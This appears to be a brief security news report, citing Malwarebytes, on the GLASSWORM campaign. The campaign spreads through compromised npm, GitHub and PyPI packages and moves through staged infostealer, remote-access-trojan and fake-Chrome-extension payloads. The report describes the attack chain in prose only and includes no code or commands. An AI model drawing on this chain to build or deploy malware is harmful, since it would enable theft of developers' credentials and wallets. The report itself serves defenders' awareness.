GLASSWORM hides inside developer tools and, once inside, steals data, installs remote access malware, and even a fake browser extension to monitor activity. According to Malwarebytes, the operation usually starts with developers, with infections spread by compromised packages from code repositories such as npm, GitHub and PyPI, or through altered versions of trusted accounts.
After installation, a preinstall script fingerprints the machine and, if the locale is Russian, execution stops; otherwise it quietly waits and contacts the Solana blockchain to fetch stage two. Stage two is an infostealer targeting browser extension profiles, wallet apps, and various credential stores, which then exfiltrates data to a remote server.
Stage three fetches a Ledger/ Trezor phishing binary and a Node[.]js Remote Access Trojan, gaining persistence via scheduled tasks and Run keys to reappear after reboot. The campaign also includes a force-installed Chrome extension, masquerading as “Google Docs Offline”, designed to surveil sessions and harvest cookies, keystrokes, and other sensitive data.